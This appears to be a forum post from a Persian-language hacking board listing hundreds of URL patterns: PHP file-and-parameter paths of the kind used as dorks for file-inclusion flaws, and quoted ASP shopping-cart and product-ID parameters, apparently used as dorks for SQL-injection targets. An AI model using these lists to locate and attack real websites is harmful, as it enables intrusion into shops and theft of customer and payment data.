principal.php?module=
sub*.php?OpenPage=
gery.php?xlink=
mod*.php?to=
padrao.php?oldal=
sub*.php?lang=
down*.php?x=
enter.php?sp=
index2.php?loader=
enter.php?loader=
principal.php?disp=
sub*.php?viewpage=
template.php?pre=
mod*.php?goFile=
press.php?second=
base.php?seccion=
sitio.php?doshow=
*inc*.php?type=
show.php?filepath=
sitio.php?qry=
general.php?pr=
layout.php?panel=
pagina.php?go=
press.php?*
default.php?var=
sub*.php?corpo=
file.php?viewpage=
press.php?itemnav=
mod*.php?ev=
blank.php?OpenPage=
head.php?tipo=
sitio.php?sec=
default.php?cmd=
blank.php?channel=
mod*.php?j=
layout.php?modo=
head.php?pageweb=
path.php?type=
layout.php?g=
nota.php?base_dir=
index2.php?showpage=
index3.php?type=
base.php?cont=
mod*.php?chapter=
sitio.php?ev=
home.php?sekce=
sitio.php?sp=
nota.php?tipo=
view.php?to=
include.php?middle=
include.php?phpbb_root_path=
index2.php?include=
nota.php?itemnav=
include.php?option=
index2.php?type=
base.php?link=
path.php?chapter=
show.php?sp=
home.php?section=
default.php?y=
gery.php?*
pagina.php?link=
index1.php?o=
gery.php?addr=
*inc*.php?menu=
path.php?where=
pagina.php?home=
file.php?doshow=
index3.php?pname=
nota.php?in=
path.php?middlePart=
down*.php?sp=
page.php?module=
index3.php?ev=
standard.php?eval=
path.php?y=
template.php?qry=
start.php?option=
info.php?subject=
page.php?abre=
sub*.php?g=
home.php?g=
file.php?play=
start.php?loader=
start.php?showpage=
info.php?ref=
pagina.php?id=
blank.php?name=
head.php?str=
print.php?header=
index3.php?mid=
down*.php?disp=
blank.php?j=
path.php?goto=
default.php?type=
mod*.php?incl=
path.php?filepath=
gery.php?base_dir=
show.php?middlePart=
*inc*.php?to=
layout.php?z=
view.php?seccion=
sitio.php?*root*=
file.php?strona=
mod*.php?pag=
index2.php?ref=
head.php?sekce=
layout.php?pref=
path.php?doshow=
path.php?panel=
file.php?pagina=
index2.php?e=
path.php?sp=
pagina.php?load=
general.php?section=
base.php?filepath=
include.php?content=
blank.php?basepath=
template.php?ref=
head.php?load=
main.php?subject=
file.php?y=
down*.php?ev=
padrao.php?choix=
index.php?channel=
nota.php?t=
blank.php?panel=
sub*.php?header=
info.php?var=
enter.php?read=
head.php?adresa=
print.php?param=
default.php?sp=
start.php?panel=
template.php?dir=
show.php?pre=
view.php?content=
print.php?strona=
sitio.php?inc=
info.php?header=
info.php?itemnav=
file.php?to=
base.php?itemnav=
standard.php?where=
sitio.php?modo=
sitio.php?disp=
print.php?addr=
mod*.php?oldal=
sub*.php?go=
start.php?load=
index2.php?option=
blank.php?mod=
index3.php?inc=
standard.php?my=
enter.php?y=
base.php?pageweb=
padrao.php?*root*=
main.php?action=
pagina.php?path=
sub*.php?phpbb_root_path=
path.php?home=
index3.php?middle=
index3.php?get=
default.php?seccion=
print.php?numero=
include.php?in=
include.php?secao=
sub*.php?sec=
home.php?channel=
base.php?body=
enter.php?ir=
home.php?oldal=
head.php?pag=
general.php?menu=
nota.php?seccion=
path.php?xlink=
page.php?mid=
index1.php?link=
blank.php?sp=
default.php?panel=
*inc*.php?doshow=
blank.php?id=
print.php?read=
sitio.php?destino=
principal.php?d=
start.php?name=
default.php?chapter=
head.php?goto=
path.php?qry=
default.php?*root*=
enter.php?cmd=
file.php?include=
enter.php?body=
index.php?chapter=
include.php?panel=
default.php?choix=
start.php?oldal=
down*.php?ir=
nota.php?module=
info.php?xlink=
enter.php?lang=
general.php?redirect=
view.php?recipe=
home.php?ir=
padrao.php?open=
base.php?subject=
padrao.php?u=
sub*.php?my=
enter.php?type=
blank.php?ir=
page.php?showpage=
home.php?disp=
index3.php?secc=
home.php?panel=
index1.php?pr=
main.php?ref=
layout.php?link=
standard.php?qry=
index2.php?thispage=
index3.php?pollname=
pagina.php?cmd=
view.php?body=
head.php?rub=
standard.php?include=
path.php?secao=
press.php?opcion=
gery.php?tipo=
index1.php?v=
pagina.php?secao=
standard.php?secc=
gery.php?loader=
index3.php?include=
pagina.php?to=
enter.php?strona=
sub*.php?s=
enter.php?get=
path.php?var=
general.php?subject=
enter.php?pa=
include.php?header=
include.php?mid=
blank.php?incl=
index2.php?corpo=
index1.php?incl=
home.php?choix=
index1.php?c=
index2.php?var=
main.php?pref=
index1.php?pname=
path.php?incl=
info.php?recipe=
view.php?sec=
file.php?where=
print.php?name=
info.php?c=
principal.php?cont=
print.php?menue=
info.php?f=
padrao.php?xlink=
index1.php?url=
gery.php?basepath=
template.php?mid=
sub*.php?id=
start.php?corpo=
file.php?chapter=
home.php?chapter=
standard.php?chapter=
press.php?page=
nota.php?n=
start.php?adresa=
default.php?e=
sub*.php?itemnav=
standard.php?go=
sitio.php?menu=
press.php?goFile=
principal.php?id=
down*.php?incl=
principal.php?z=
main.php?my=
start.php?ir=
info.php?ki=
file.php?loader=
index.php?mid=
down*.php?seite=
base.php?lang=
nota.php?inc=
standard.php?index=
index1.php?var=
principal.php?p=
pagina.php?index=
view.php?qry=
home.php?tipo=
page.php?numero=
index1.php?strona=
show.php?inc=
index2.php?redirect=
pagina.php?middlePart=
template.php?base_dir=
info.php?mid=
home.php?module=
general.php?left=
print.php?doshow=
general.php?page=
path.php?adresa=
page.php?seite=
home.php?menu=
index2.php?open=
blank.php?pname=
sub*.php?modo=
index2.php?goto=
path.php?subject=
general.php?sivu=
general.php?read=
principal.php?ev=
press.php?to=
main.php?middle=
print.php?pollname=
index2.php?strona=
template.php?f=
template.php?e=
press.php?pagina=
print.php?ki=
page.php?z=
enter.php?left=
head.php?middlePart=
gery.php?ev=
index3.php?ref=
file.php?id=
print.php?loc=
sitio.php?body=
pagina.php?n=
down*.php?s=
padrao.php?a=
page.php?OpenPage=
gery.php?option=
mod*.php?sekce=
template.php?thispage=
head.php?viewpage=
file.php?incl=
sitio.php?e=
page.php?cont=
sub*.php?adresa=
index2.php?pg=
layout.php?thispage=
padrao.php?body=
base.php?t=
press.php?redirect=
pagina.php?seccion=
layout.php?action=
sitio.php?option=
index2.php?category=
pagina.php?lang=
include.php?ref=
index3.php?thispage=
sub*.php?seite=
layout.php?addr=
nota.php?mid=
page.php?p=
mod*.php?corpo=
press.php?t=
blank.php?category=
*inc*.php?y=
nota.php?category=
show.php?d=
enter.php?menue=
index1.php?t=
nota.php?adresa=
main.php?thispage=
layout.php?tipo=
index3.php?d=
enter.php?b=
main.php?loc=
standard.php?z=
show.php?base_dir=
sitio.php?middlePart=
template.php?a=
page.php?read=
index.php?param=
default.php?channel=
sub*.php?link=
padrao.php?texto=
base.php?base_dir=
file.php?texto=
base.php?middle=
pagina.php?base_dir=
print.php?tipo=
principal.php?pag=
index2.php?loc=
nota.php?option=
home.php?index=
print.php?base_dir=
file.php?get=
info.php?content=
default.php?goto=
start.php?include=
print.php?option=
default.php?v=
base.php?numero=
index2.php?qry=
sub*.php?secao=
sub*.php?secc=
mod*.php?lang=
standard.php?pollname=
default.php?load=
show.php?j=
down*.php?pa=
standard.php?open=
file.php?disp=
press.php?xlink=
print.php?s=
mod*.php?secc=
index1.php?param=
index3.php?sivu=
mod*.php?pg=
layout.php?cmd=
info.php?phpbb_root_path=
print.php?OpenPage=
default.php?thispage=
enter.php?sec=
path.php?*
home.php?middlePart=
index3.php?channel=
template.php?sekce=
down*.php?goFile=
blank.php?header=
start.php?body=
base.php?module=
default.php?l=
index2.php?texto=
home.php?eval=
padrao.php?section=
blank.php?goFile=
index.php?index=
layout.php?ir=
blank.php?pollname=
include.php?x=
start.php?pageweb=
gery.php?rub=
template.php?sp=
sub*.php?basepath=
standard.php?section=
enter.php?abre=
index1.php?pa=
principal.php?seite=
gery.php?chapter=
nota.php?qry=
pagina.php?pagina=
default.php?menu=
standard.php?*
default.php?abre=
press.php?pg=
start.php?nivel=
index1.php?filepath=
padrao.php?op=
mod*.php?pre=
default.php?pa=
press.php?strona=
nota.php?cmd=
standard.php?abre=
general.php?seccion=
index1.php?itemnav=
layout.php?seite=
home.php?pollname=
path.php?left=
down*.php?inc=
include.php?channel=
print.php?dir=
main.php?disp=
print.php?pre=
padrao.php?cont=
padrao.php?menu=
path.php?addr=
base.php?sekce=
pagina.php?loader=
page.php?go=
press.php?category=
gery.php?left=
down*.php?qry=
file.php?second=
include.php?pag=
base.php?ir=
template.php?addr=
sitio.php?nivel=
include.php?destino=
head.php?disp=
general.php?w=
gery.php?sec=
base.php?var=
enter.php?addr=
enter.php?go=
page.php?middle=
start.php?home=
info.php?rub=
pagina.php?OpenPage=
head.php?content=
principal.php?pref=
home.php?in=
path.php?disp=
main.php?index=
file.php?eval=
press.php?base_dir=
main.php?content=
show.php?disp=
index.php?opcion=
view.php?loader=
down*.php?strona=
principal.php?seccion=
principal.php?n=
blank.php?link=
file.php?sivu=
info.php?adresa=
*inc*.php?ki=
padrao.php?incl=
main.php?eval=
gery.php?nivel=
sub*.php?goFile=
info.php?sec=
main.php?include=
main.php?page=
base.php?*
home.php?rub=
default.php?k=
index3.php?t=
file.php?showpage=
enter.php?home=
info.php?menue=
index.php?middlePart=
blank.php?corpo=
press.php?where=
path.php?p=
page.php?*
enter.php?path=
press.php?ir=
index1.php?path=
sub*.php?option=
sub*.php?pag=
layout.php?where=
info.php?o=
file.php?oldal=
template.php?menue=
press.php?abre=
layout.php?OpenPage=
home.php?play=
sitio.php?pg=
main.php?filepath=
general.php?to=
index1.php?*root*=
show.php?qry=
print.php?where=
index2.php?itemnav=
pagina.php?q=
enter.php?str=
enter.php?name=
sitio.php?addr=
enter.php?incl=
index3.php?mod=
template.php?opcion=
nota.php?pre=
head.php?lang=
pagina.php?g=
include.php?tipo=
default.php?loc=
principal.php?destino=
index3.php?menue=
index.php?y=
home.php?opcion=
print.php?middlePart=
sitio.php?secc=
show.php?read=
standard.php?var=
info.php?param=
head.php?start=
view.php?oldal=
mod*.php?play=
gery.php?h=
pagina.php?mid=
sub*.php?thispage=
layout.php?loader=
enter.php?qry=
padrao.php?filepath=
include.php?ir=
sub*.php?u=
base.php?chapter=
press.php?pageweb=
sub*.php?pa=
enter.php?texto=
home.php?link=
template.php?*
gery.php?action=
base.php?oldal=
index3.php?dir=
include.php?ki=
index3.php?body=
standard.php?oldal=
nota.php?showpage=
general.php?f=
padrao.php?pag=
*inc*.php?rub=
index2.php?adresa=
head.php?sec=
nota.php?filepath=
print.php?link=
gery.php?pname=
show.php?pname=
base.php?loc=
file.php?q=
gery.php?sivu=
padrao.php?header=
layout.php?abre=
index3.php?pref=
enter.php?subject=
page.php?modo=
page.php?left=
base.php?abre=
index3.php?addr=
blank.php?pr=
*inc*.php?get=
print.php?play=
padrao.php?secao=
index.php?str=
general.php?sekce=
show.php?m=
head.php?b=
index1.php?mod=
home.php?showpage=
home.php?cmd=
index1.php?read=
page.php?load=
general.php?choix=
home.php?my=
start.php?param=
layout.php?sekce=
enter.php?module=
mod*.php?secao=
show.php?n=
start.php?pname=
down*.php?doshow=
index2.php?pre=
layout.php?nivel=
home.php?base_dir=
include.php?eval=
standard.php?xlink=
info.php?home=
general.php?body=
head.php?play=
file.php?index=
mod*.php?OpenPage=
index.php?b=
principal.php?ki=
sub*.php?panel=
path.php?sec=
nota.php?left=
default.php?header=
padrao.php?qry=
file.php?corpo=
padrao.php?strona=
sub*.php?z=
pagina.php?include=
page.php?link=
start.php?abre=
print.php?goFile=
*inc*.php?c=
down*.php?cmd=
home.php?middle=
sub*.php?open=
include.php?second=
sitio.php?menue=
path.php?tipo=
home.php?addr=
gery.php?pref=
pagina.php?k=
head.php?strona=
general.php?e=
blank.php?get=
blank.php?sivu=
sitio.php?read=
home.php?thispage=
pagina.php?loc=
layout.php?qry=
print.php?*root*=
show.php?to=
view.php?u=
view.php?chapter=
principal.php?nivel=
info.php?secao=
nota.php?abre=
standard.php?menu=
index2.php?pollname=
index3.php?path=
index.php?base_dir=
general.php?secao=
mod*.php?home=
down*.php?section=
default.php?index=
general.php?doshow=
padrao.php?abre=
enter.php?seite=
down*.php?lang=
main.php?xlink=
index3.php?base_dir=
gery.php?redirect=
layout.php?basepath=
pagina.php?modo=
index.php?adresa=
down*.php?u=
main.php?mod=
file.php?start=
view.php?redirect=
index2.php?u=
padrao.php?*
info.php?ev=
index1.php?nivel=
include.php?seccion=
view.php?lang=
mod*.php?include=
mod*.php?seccion=
principal.php?pollname=
include.php?read=
press.php?rub=
index2.php?incl=
pagina.php?chapter=
view.php?middle=
print.php?sekce=
padrao.php?pname=
head.php?ref=
principal.php?link=
gery.php?menue=
template.php?op=
info.php?doshow=
default.php?sivu=
nota.php?pagina=
sitio.php?content=
press.php?thispage=
press.php?pa=
index1.php?redirect=
padrao.php?menue=
index2.php?sekce=
mod*.php?d=
include.php?filepath=
principal.php?l=
layout.php?oldal=
include.php?b=
layout.php?pollname=
start.php?play=
print.php?r=
info.php?*
sub*.php?*
  * *=
mod*.php?addr=
base.php?category=
index2.php?d=
mod*.php?phpbb_root_path=
default.php?include=
press.php?module=
default.php?module=
info.php?pname=
path.php?id=
general.php?get=
press.php?path=
padrao.php?sekce=
base.php?ki=
file.php?cmd=
layout.php?section=
press.php?include=
mod*.php?destino=
base.php?doshow=
principal.php?load=
print.php?type=
index1.php?adresa=
index3.php?pre=
standard.php?cont=
gery.php?open=
blank.php?read=
sitio.php?redirect=
index1.php?cmd=
info.php?redirect=
file.php?load=
index3.php?itemnav=
gery.php?mod=
enter.php?ref=
down*.php?t=
view.php?goFile=
file.php?var=
sitio.php?ir=
show.php?b=
sitio.php?param=
sub*.php?rub=
print.php?opcion=
press.php?middle=
info.php?ir=
home.php?basepath=
blank.php?section=
include.php?to=
start.php?sp=
index3.php?name=
template.php?showpage=
view.php?ki=
index1.php?sekce=
press.php?option=
nota.php?home=
gery.php?my=
show.php?mid=
blank.php?o=
sitio.php?pr=
index3.php?destino=
main.php?body=
blank.php?lang=
path.php?thispage=
padrao.php?OpenPage=
info.php?pageweb=
blank.php?h=
head.php?incl=
principal.php?ref=
start.php?go=
file.php?action=
template.php?t=
base.php?mid=
start.php?b=
start.php?lang=
default.php?rub=
head.php?read=
show.php?cmd=
press.php?get=
principal.php?secc=
gery.php?menu=
gery.php?corpo=
include.php?module=
page.php?redirect=
gery.php?filepath=
general.php?ir=
file.php?ref=
index1.php?seite=
include.php?pageweb=
show.php?seccion=
mod*.php?pagina=
sub*.php?name=
padrao.php?c=
padrao.php?eval=
file.php?ev=
default.php?body=
enter.php?itemnav=
blank.php?var=
index.php?addr=
blank.php?oldal=
nota.php?url=
index2.php?action=
blank.php?phpbb_root_path=
mod*.php?var=
mod*.php?strona=
nota.php?nivel=
template.php?content=
mod*.php?content=
default.php?f=
view.php?goto=
principal.php?abre=
pagina.php?filepath=
nota.php?link=
template.php?tipo=
index3.php?q=
page.php?adresa=
sitio.php?category=
index2.php?link=
sub*.php?k=
layout.php?numero=
tools/send_reminders.php?includedir=
module_db.php?pivot_path=
inc/cmses/aedatingCMS.php?dir[inc]=
modules/vwar/admin/admin.php?vwar_root=
bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=
index.php?RP_PATH=
index.php?pagename=
smarty_config.php?root_dir=
components/com_forum/download.php?phpbb_root_path=
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=
classes/adodbt/sql.php?classes_dir=
send_reminders.php?includedir=
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=
inc/functions.inc.php?config[ppa_root_path]=
components/com_cpg/cpg.php?mosConfig_absolute_path=
admin/index.php?o=
index.php?menu=deti&page=
modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
m2f/m2f_phpbb204.php?m2f_root_path=
components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
admin/doeditconfig.php?thispath=../includes&config[path]=
components/com_simpleboard/image_upload.php?sbp=
wamp_dir/setup/yesno.phtml?no_url=
include/new-visitor.inc.php?lvc_include_dir=
support/mailling/maillist/inc/initdb.php?absolute_path=
coppercop/theme.php?THEME_DIR=
inc/header.php/step_one.php?server_inc=
inc/pipe.php?HCL_path=
include/new-visitor
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory ="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID= "
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID"


HAJI_CRUEL#

 

 

 

#گرگ_خسته

0 کاربر در حال خواندن این موضوع است

0 کاربر، 0 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP